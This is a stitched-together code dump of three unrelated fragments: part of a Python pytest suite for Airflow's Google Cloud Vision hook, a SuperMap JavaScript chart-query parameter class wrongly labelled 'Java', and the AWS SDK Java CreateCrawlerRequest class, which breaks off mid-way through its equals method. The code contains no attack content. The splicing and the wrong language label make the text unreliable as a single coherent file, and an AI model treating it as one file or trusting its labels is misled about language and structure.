PRODUCT_ID_TEST_2 ) product = Product(name=explicit_p_name) template_p_name = 
ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST) # When # Location and product_id are passed in addition to a Product with an explicit name, # but both names differ (constructed != explicit). # Should throw AirflowException in this case. with pytest.raises(AirflowException) as ctx: self.hook.update_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value assert err assert ( ERR_DIFF_NAMES.format( explicit_name=explicit_p_name, constructed_name=template_p_name, label="Product", id_label="product_id", ) in str(err) ) update_product_method.assert_not_called() @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_delete_product(self, get_conn): # Given delete_product_method = get_conn.return_value.delete_product delete_product_method.return_value = None name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST) # When response = self.hook.delete_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST ) # Then assert response is None delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_text(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.text_detection detect_text_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.text_detection(image=DETECT_TEST_IMAGE) # Then detect_text_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_text_with_additional_properties(self, annotator_client_mock): # Given 
detect_text_method = annotator_client_mock.text_detection detect_text_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.text_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then detect_text_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_text_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.text_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.text_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_document_text_detection(self, annotator_client_mock): # Given document_text_detection_method = annotator_client_mock.document_text_detection document_text_detection_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.document_text_detection(image=DETECT_TEST_IMAGE) # Then document_text_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_document_text_detection_with_additional_properties(self, annotator_client_mock): # Given document_text_detection_method = annotator_client_mock.document_text_detection document_text_detection_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.document_text_detection( 
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then document_text_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_document_text_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.document_text_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.document_text_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_label_detection(self, annotator_client_mock): # Given label_detection_method = annotator_client_mock.label_detection label_detection_method.return_value = AnnotateImageResponse( label_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.label_detection(image=DETECT_TEST_IMAGE) # Then label_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_label_detection_with_additional_properties(self, annotator_client_mock): # Given label_detection_method = annotator_client_mock.label_detection label_detection_method.return_value = AnnotateImageResponse( label_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.label_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then label_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) 
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_label_detection_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.label_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.label_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_safe_search_detection(self, annotator_client_mock): # Given safe_search_detection_method = annotator_client_mock.safe_search_detection safe_search_detection_method.return_value = AnnotateImageResponse( safe_search_annotation=SafeSearchAnnotation( adult="VERY_UNLIKELY", spoof="VERY_UNLIKELY", medical="VERY_UNLIKELY", violence="VERY_UNLIKELY", racy="VERY_UNLIKELY", ) ) # When self.hook.safe_search_detection(image=DETECT_TEST_IMAGE) # Then safe_search_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_safe_search_detection_with_additional_properties(self, annotator_client_mock): # Given safe_search_detection_method = annotator_client_mock.safe_search_detection safe_search_detection_method.return_value = AnnotateImageResponse( safe_search_annotation=SafeSearchAnnotation( adult="VERY_UNLIKELY", spoof="VERY_UNLIKELY", medical="VERY_UNLIKELY", violence="VERY_UNLIKELY", racy="VERY_UNLIKELY", ) ) # When self.hook.safe_search_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then safe_search_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) 
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_safe_search_detection_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.safe_search_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.safe_search_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err)
Java
/* COPYRIGHT 2012 SUPERMAP
 * 本程序只能在有效的授权许可下使用。
 * 未经许可,不得以任何手段擅自使用或传播。*/

/**
 * @requires SuperMap/Util.js
 * @requires SuperMap/REST.js
 */

/**
 * Class: SuperMap.REST.ChartQueryParameters
 * Parameter class for chart (ENC) queries. A chart query runs in one of two
 * modes, selected via the `queryMode` property: attribute query
 * ("ChartAttributeQuery") or bounds query ("ChartBoundsQuery").
 * Required properties: queryMode, chartLayerNames, chartQueryFilterParameters;
 * a bounds query additionally requires `bounds`.
 */
SuperMap.REST.ChartQueryParameters = SuperMap.Class({

    /**
     * APIProperty: queryMode
     * {String} Query mode: "ChartAttributeQuery" or "ChartBoundsQuery".
     */
    queryMode: null,

    /**
     * APIProperty: bounds
     * {<SuperMap.Bounds>} Spatial extent of the query (bounds query only).
     */
    bounds: null,

    /**
     * APIProperty: chartLayerNames
     * {Array(String)} Names of the chart layers to query.
     */
    chartLayerNames: null,

    /**
     * APIProperty: chartQueryFilterParameters
     * {Array <SuperMap.REST.ChartQueryFilterParameter>} Filter parameters for
     * the query: object code, the geometry kinds the object applies to
     * (point/line/area) and attribute-field filter conditions.
     */
    chartQueryFilterParameters: null,

    /**
     * Property: returnContent
     * {Boolean} When true (the default) the query returns record sets, stored
     * in QueryResult.Recordsets (QueryResult.ResourceInfo is empty); when
     * false it returns a result resource instead, stored in
     * QueryResult.ResourceInfo (QueryResult.Recordsets is empty).
     */
    returnContent: true,

    /**
     * APIProperty: startRecord
     * {Number} Zero-based index of the first record to return. Defaults to 0.
     */
    startRecord: 0,

    /**
     * APIProperty: expectCount
     * {Number} Expected number of records to return; must be greater than 0.
     */
    expectCount: null,

    /**
     * Constructor: SuperMap.REST.ChartQueryParameters
     * Creates a new instance and copies the supplied options onto it.
     *
     * Parameters:
     * options - {Object} Optional property bag; see the API properties above
     * (queryMode, bounds, chartLayerNames, chartQueryFilterParameters,
     * returnContent, startRecord, expectCount).
     */
    initialize: function (options) {
        if (!options) {
            return;
        }
        SuperMap.Util.extend(this, options);
    },

    /**
     * APIMethod: destroy
     * Releases resources by resetting all properties to their default values.
     */
    destroy: function () {
        var me = this;
        me.queryMode = null;
        me.bounds = null;
        me.chartLayerNames = null;
        me.chartQueryFilterParameters = null;
        me.returnContent = true;
        me.startRecord = 0;
        me.expectCount = null;
    },

    /**
     * Method: getVariablesJson
     * Serializes the parameters into the JSON string understood by the
     * service.
     *
     * Returns:
     * {String} JSON representation of the query parameters.
     */
    getVariablesJson: function () {
        var json = "";
        json += "\"queryMode\":\"" + this.queryMode + "\",";
        if (this.chartLayerNames && this.chartLayerNames.length) {
            var chartLayersArray = [];
            for (var i = 0, layerLength = this.chartLayerNames.length; i < layerLength; i++) {
                chartLayersArray.push("\"" + this.chartLayerNames[i] + "\"");
            }
            json += "\"chartLayerNames\":[" + chartLayersArray.join(",") + "],";
        }
        // The bounds section is only meaningful for a bounds query.
        if (this.queryMode === "ChartBoundsQuery" && this.bounds) {
            json += "\"bounds\":" + "{" + "\"leftBottom\":" + "{" + "\"x\":" + this.bounds.left + "," +
                "\"y\":" + this.bounds.bottom + "}" + "," + "\"rightTop\":" + "{" + "\"x\":" + this.bounds.right + "," +
                "\"y\":" + this.bounds.top + "}" + "},";
        }
        if (this.chartQueryFilterParameters && this.chartQueryFilterParameters.length) {
            var chartParamArray = [];
            for (var j = 0, chartLength = this.chartQueryFilterParameters.length; j < chartLength; j++) {
                // Fixed: the original allocated a throwaway
                // ChartQueryFilterParameter here and immediately overwrote the
                // reference; use the stored parameter directly.
                chartParamArray.push(this.chartQueryFilterParameters[j].toJson());
            }
            var chartParamsJson = "\"chartQueryParams\":[" + chartParamArray.join(",") + "],";
            chartParamsJson += "\"startRecord\":" + this.startRecord + ",";
            chartParamsJson += "\"expectCount\":" + this.expectCount;
            json += "\"chartQueryParameters\":{" + chartParamsJson + "}";
        }
        // Fixed: drop a dangling trailing comma so the result stays valid JSON
        // even when the optional trailing sections are absent (JSON objects do
        // not allow trailing commas).
        if (json.charAt(json.length - 1) === ",") {
            json = json.substring(0, json.length - 1);
        }
        return "{" + json + "}";
    },

    CLASS_NAME: "SuperMap.REST.ChartQueryParameters"
})
Java
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.glue.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.AmazonWebServiceRequest; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/glue-2017-03-31/CreateCrawler" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class CreateCrawlerRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable { /** * <p> * Name of the new crawler. * </p> */ private String name; /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> */ private String role; /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> */ private String databaseName; /** * <p> * A description of the new crawler. * </p> */ private String description; /** * <p> * A list of collection of targets to crawl. * </p> */ private CrawlerTargets targets; /** * <p> * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for * Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify: * <code>cron(15 12 * * ? *)</code>. 
* </p> */ private String schedule; /** * <p> * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a * crawl, but these custom classifiers always override the default classifiers for a given classification. * </p> */ private java.util.List<String> classifiers; /** * <p> * The table prefix used for catalog tables that are created. * </p> */ private String tablePrefix; /** * <p> * The policy for the crawler's update and deletion behavior. * </p> */ private SchemaChangePolicy schemaChangePolicy; /** * <p> * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since * the last crawler run. * </p> */ private RecrawlPolicy recrawlPolicy; /** * <p> * Specifies data lineage configuration settings for the crawler. * </p> */ private LineageConfiguration lineageConfiguration; private LakeFormationConfiguration lakeFormationConfiguration; /** * <p> * Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's * behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. * </p> */ private String configuration; /** * <p> * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. * </p> */ private String crawlerSecurityConfiguration; /** * <p> * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information * about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web * Services Tags in Glue</a> in the developer guide. * </p> */ private java.util.Map<String, String> tags; /** * <p> * Name of the new crawler. * </p> * * @param name * Name of the new crawler. */ public void setName(String name) { this.name = name; } /** * <p> * Name of the new crawler. * </p> * * @return Name of the new crawler. 
*/ public String getName() { return this.name; } /** * <p> * Name of the new crawler. * </p> * * @param name * Name of the new crawler. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withName(String name) { setName(name); return this; } /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> * * @param role * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer * resources. */ public void setRole(String role) { this.role = role; } /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> * * @return The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer * resources. */ public String getRole() { return this.role; } /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> * * @param role * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer * resources. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withRole(String role) { setRole(role); return this; } /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> * * @param databaseName * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. */ public void setDatabaseName(String databaseName) { this.databaseName = databaseName; } /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. 
* </p> * * @return The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. */ public String getDatabaseName() { return this.databaseName; } /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> * * @param databaseName * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withDatabaseName(String databaseName) { setDatabaseName(databaseName); return this; } /** * <p> * A description of the new crawler. * </p> * * @param description * A description of the new crawler. */ public void setDescription(String description) { this.description = description; } /** * <p> * A description of the new crawler. * </p> * * @return A description of the new crawler. */ public String getDescription() { return this.description; } /** * <p> * A description of the new crawler. * </p> * * @param description * A description of the new crawler. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withDescription(String description) { setDescription(description); return this; } /** * <p> * A list of collection of targets to crawl. * </p> * * @param targets * A list of collection of targets to crawl. */ public void setTargets(CrawlerTargets targets) { this.targets = targets; } /** * <p> * A list of collection of targets to crawl. * </p> * * @return A list of collection of targets to crawl. */ public CrawlerTargets getTargets() { return this.targets; } /** * <p> * A list of collection of targets to crawl. * </p> * * @param targets * A list of collection of targets to crawl. * @return Returns a reference to this object so that method calls can be chained together. 
*/
    public CreateCrawlerRequest withTargets(CrawlerTargets targets) {
        setTargets(targets);
        return this;
    }

    /**
     * <p>
     * A <code>cron</code> expression used to specify the schedule (see <a
     * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
     * Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would specify:
     * <code>cron(15 12 * * ? *)</code>.
     * </p>
     *
     * @param schedule
     *        the <code>cron</code> expression used to specify the schedule
     */
    public void setSchedule(String schedule) {
        this.schedule = schedule;
    }

    /**
     * @return the <code>cron</code> expression used to specify the schedule, or <code>null</code> if none was set
     */
    public String getSchedule() {
        return this.schedule;
    }

    /**
     * Fluent variant of {@link #setSchedule(String)}.
     *
     * @param schedule
     *        the <code>cron</code> expression used to specify the schedule
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withSchedule(String schedule) {
        setSchedule(schedule);
        return this;
    }

    /**
     * <p>
     * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in
     * a crawl, but these custom classifiers always override the default classifiers for a given classification.
     * </p>
     *
     * @return the registered custom classifiers, or <code>null</code> if none were set
     */
    public java.util.List<String> getClassifiers() {
        return classifiers;
    }

    /**
     * Sets the custom classifiers, replacing any previous value. A defensive copy of the supplied collection is
     * stored; passing <code>null</code> clears the list.
     *
     * @param classifiers
     *        the custom classifiers to use, or <code>null</code> to clear
     */
    public void setClassifiers(java.util.Collection<String> classifiers) {
        if (classifiers == null) {
            this.classifiers = null;
            return;
        }
        this.classifiers = new java.util.ArrayList<String>(classifiers);
    }

    /**
     * <p>
     * <b>NOTE:</b> This method appends the values to the existing list (if any). Use
     * {@link #setClassifiers(java.util.Collection)} or {@link #withClassifiers(java.util.Collection)} if you want to
     * override the existing values.
     * </p>
     *
     * @param classifiers
     *        custom classifiers to append to the current list
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withClassifiers(String... classifiers) {
        if (this.classifiers == null) {
            setClassifiers(new java.util.ArrayList<String>(classifiers.length));
        }
        for (String ele : classifiers) {
            this.classifiers.add(ele);
        }
        return this;
    }

    /**
     * Fluent variant of {@link #setClassifiers(java.util.Collection)}; replaces any existing values.
     *
     * @param classifiers
     *        the custom classifiers to use, or <code>null</code> to clear
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withClassifiers(java.util.Collection<String> classifiers) {
        setClassifiers(classifiers);
        return this;
    }

    /**
     * <p>
     * The table prefix used for catalog tables that are created.
     * </p>
     *
     * @param tablePrefix
     *        the table prefix used for catalog tables that are created
     */
    public void setTablePrefix(String tablePrefix) {
        this.tablePrefix = tablePrefix;
    }

    /**
     * @return the table prefix used for catalog tables that are created, or <code>null</code> if none was set
     */
    public String getTablePrefix() {
        return this.tablePrefix;
    }

    /**
     * Fluent variant of {@link #setTablePrefix(String)}.
     *
     * @param tablePrefix
     *        the table prefix used for catalog tables that are created
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withTablePrefix(String tablePrefix) {
        setTablePrefix(tablePrefix);
        return this;
    }

    /**
     * <p>
     * The policy for the crawler's update and deletion behavior.
     * </p>
     *
     * @param schemaChangePolicy
     *        the policy for the crawler's update and deletion behavior
     */
    public void setSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) {
        this.schemaChangePolicy = schemaChangePolicy;
    }

    /**
     * @return the policy for the crawler's update and deletion behavior, or <code>null</code> if none was set
     */
    public SchemaChangePolicy getSchemaChangePolicy() {
        return this.schemaChangePolicy;
    }

    /**
     * Fluent variant of {@link #setSchemaChangePolicy(SchemaChangePolicy)}.
     *
     * @param schemaChangePolicy
     *        the policy for the crawler's update and deletion behavior
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) {
        setSchemaChangePolicy(schemaChangePolicy);
        return this;
    }

    /**
     * <p>
     * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added
     * since the last crawler run.
     * </p>
     *
     * @param recrawlPolicy
     *        the recrawl policy for this crawler
     */
    public void setRecrawlPolicy(RecrawlPolicy recrawlPolicy) {
        this.recrawlPolicy = recrawlPolicy;
    }

    /**
     * @return the recrawl policy for this crawler, or <code>null</code> if none was set
     */
    public RecrawlPolicy getRecrawlPolicy() {
        return this.recrawlPolicy;
    }

    /**
     * Fluent variant of {@link #setRecrawlPolicy(RecrawlPolicy)}.
     *
     * @param recrawlPolicy
     *        the recrawl policy for this crawler
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withRecrawlPolicy(RecrawlPolicy recrawlPolicy) {
        setRecrawlPolicy(recrawlPolicy);
        return this;
    }

    /**
     * <p>
     * Specifies data lineage configuration settings for the crawler.
     * </p>
     *
     * @param lineageConfiguration
     *        the data lineage configuration settings for the crawler
     */
    public void setLineageConfiguration(LineageConfiguration lineageConfiguration) {
        this.lineageConfiguration = lineageConfiguration;
    }

    /**
     * @return the data lineage configuration settings for the crawler, or <code>null</code> if none were set
     */
    public LineageConfiguration getLineageConfiguration() {
        return this.lineageConfiguration;
    }

    /**
     * Fluent variant of {@link #setLineageConfiguration(LineageConfiguration)}.
     *
     * @param lineageConfiguration
     *        the data lineage configuration settings for the crawler
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withLineageConfiguration(LineageConfiguration lineageConfiguration) {
        setLineageConfiguration(lineageConfiguration);
        return this;
    }

    /**
     * Sets the Lake Formation configuration for the crawler.
     *
     * @param lakeFormationConfiguration
     *        the Lake Formation configuration to use
     */
    public void setLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) {
        this.lakeFormationConfiguration = lakeFormationConfiguration;
    }

    /**
     * @return the Lake Formation configuration for the crawler, or <code>null</code> if none was set
     */
    public LakeFormationConfiguration getLakeFormationConfiguration() {
        return this.lakeFormationConfiguration;
    }

    /**
     * Fluent variant of {@link #setLakeFormationConfiguration(LakeFormationConfiguration)}.
     *
     * @param lakeFormationConfiguration
     *        the Lake Formation configuration to use
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) {
        setLakeFormationConfiguration(lakeFormationConfiguration);
        return this;
    }

    /**
     * <p>
     * Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
     * behavior. For more information, see <a
     * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
     * </p>
     *
     * @param configuration
     *        the versioned JSON crawler configuration string
     */
    public void setConfiguration(String configuration) {
        this.configuration = configuration;
    }

    /**
     * @return the versioned JSON crawler configuration string, or <code>null</code> if none was set
     */
    public String getConfiguration() {
        return this.configuration;
    }

    /**
     * Fluent variant of {@link #setConfiguration(String)}.
     *
     * @param configuration
     *        the versioned JSON crawler configuration string
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withConfiguration(String configuration) {
        setConfiguration(configuration);
        return this;
    }

    /**
     * <p>
     * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
     * </p>
     *
     * @param crawlerSecurityConfiguration
     *        the name of the <code>SecurityConfiguration</code> structure to be used by this crawler
     */
    public void setCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) {
        this.crawlerSecurityConfiguration = crawlerSecurityConfiguration;
    }

    /**
     * @return the name of the <code>SecurityConfiguration</code> structure to be used by this crawler, or
     *         <code>null</code> if none was set
     */
    public String getCrawlerSecurityConfiguration() {
        return this.crawlerSecurityConfiguration;
    }

    /**
     * Fluent variant of {@link #setCrawlerSecurityConfiguration(String)}.
     *
     * @param crawlerSecurityConfiguration
     *        the name of the <code>SecurityConfiguration</code> structure to be used by this crawler
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) {
        setCrawlerSecurityConfiguration(crawlerSecurityConfiguration);
        return this;
    }

    /**
     * <p>
     * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
     * information about tags in Glue, see <a
     * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a> in the
     * developer guide.
     * </p>
     *
     * @return the tags to use with this crawler request, or <code>null</code> if none were set
     */
    public java.util.Map<String, String> getTags() {
        return tags;
    }

    /**
     * Sets the tags to use with this crawler request, replacing any previous value.
     *
     * @param tags
     *        the tags to use with this crawler request
     */
    public void setTags(java.util.Map<String, String> tags) {
        this.tags = tags;
    }

    /**
     * Fluent variant of {@link #setTags(java.util.Map)}.
     *
     * @param tags
     *        the tags to use with this crawler request
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest withTags(java.util.Map<String, String> tags) {
        setTags(tags);
        return this;
    }

    /**
     * Add a single Tags entry
     *
     * @param key
     *        the tag key; must not already be present in the map
     * @param value
     *        the tag value
     * @return a reference to this object so that method calls can be chained together.
     * @throws IllegalArgumentException
     *         if an entry for <code>key</code> has already been added
     * @see CreateCrawlerRequest#withTags
     */
    public CreateCrawlerRequest addTagsEntry(String key, String value) {
        if (null == this.tags) {
            this.tags = new java.util.HashMap<String, String>();
        }
        if (this.tags.containsKey(key))
            // use the key directly: key.toString() would NPE on a duplicate null key
            throw new IllegalArgumentException("Duplicated keys (" + key + ") are provided.");
        this.tags.put(key, value);
        return this;
    }

    /**
     * Removes all the entries added into Tags.
     *
     * @return Returns a reference to this object so that method calls can be chained together.
     */
    public CreateCrawlerRequest clearTagsEntries() {
        this.tags = null;
        return this;
    }

    /**
     * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will
     * be redacted from this string using a placeholder value.
     *
     * @return A string representation of this object.
     *
     * @see java.lang.Object#toString()
     */
    @Override
    public String toString() {
        StringBuilder sb = new StringBuilder();
        sb.append("{");
        if (getName() != null)
            sb.append("Name: ").append(getName()).append(",");
        if (getRole() != null)
            sb.append("Role: ").append(getRole()).append(",");
        if (getDatabaseName() != null)
            sb.append("DatabaseName: ").append(getDatabaseName()).append(",");
        if (getDescription() != null)
            sb.append("Description: ").append(getDescription()).append(",");
        if (getTargets() != null)
            sb.append("Targets: ").append(getTargets()).append(",");
        if (getSchedule() != null)
            sb.append("Schedule: ").append(getSchedule()).append(",");
        if (getClassifiers() != null)
            sb.append("Classifiers: ").append(getClassifiers()).append(",");
        if (getTablePrefix() != null)
            sb.append("TablePrefix: ").append(getTablePrefix()).append(",");
        if (getSchemaChangePolicy() != null)
            sb.append("SchemaChangePolicy: ").append(getSchemaChangePolicy()).append(",");
        if (getRecrawlPolicy() != null)
            sb.append("RecrawlPolicy: ").append(getRecrawlPolicy()).append(",");
        if (getLineageConfiguration() != null)
            sb.append("LineageConfiguration: ").append(getLineageConfiguration()).append(",");
        if (getLakeFormationConfiguration() != null)
            sb.append("LakeFormationConfiguration: ").append(getLakeFormationConfiguration()).append(",");
        if (getConfiguration() != null)
            sb.append("Configuration: ").append(getConfiguration()).append(",");
        if (getCrawlerSecurityConfiguration() != null)
            sb.append("CrawlerSecurityConfiguration: ").append(getCrawlerSecurityConfiguration()).append(",");
        if (getTags() != null)
            sb.append("Tags: ").append(getTags());
        sb.append("}");
        return sb.toString();
    }

    @Override
    public boolean equals(Object obj) {
        if (this == obj)
            return true;
        if (obj == null)
            return false;

        if (obj instanceof CreateCrawlerRequest == false)
            return false;
        CreateCrawlerRequest other = (CreateCrawlerRequest) obj;
        if (other.getName() == null ^ this.getName() == null)
            return false;
        if (other.getName() != null && other.getName().equals(this.getName()) == false)
            return false;
        if (other.getRole() == null ^ this.getRole() == null)
            return false;
        if (other.getRole() != null && other.getRole().equals(this.getRole()) == false)
            return false;
        if (other.getDatabaseName() == null ^ this.getDatabaseName() == null)
            return false;
        if (other.getDatabaseName() != null && other.getDatabaseName().equals(this.getDatabaseName()) == false)
            return false;
        if (other.getDescription() == null ^ this.getDescription() == null)
            return false;
        if (other.getDescription() != null && other.getDescription().equals(this.getDescription()) == false)
            return false;
        if (other.getTargets() == null ^ this.getTargets() == null)
            return false;
        if (other.getTargets() != null && other.getTargets().equals(this.getTargets()) == false)
            return false;
        if (other.getSchedule() == null ^ this.getSchedule() == null)
            return false;
        if (other.getSchedule() != null && other.getSchedule().equals(this.getSchedule()) == false)
            return false;
        if (other.getClassifiers() == null ^ this.getClassifiers() == null)
            return false;
        if (other.getClassifiers() != null && other.getClassifiers().equals(this.getClassifiers()) == false)
            return false;
        if (other.getTablePrefix() == null ^ this.getTablePrefix() == null)
            return false;
        if (other.getTablePrefix() != null && other.getTablePrefix().equals(this.getTablePrefix()) == false)
            return false;
        if (other.getSchemaChangePolicy() == null ^ this.getSchemaChangePolicy() == null)
            return false;
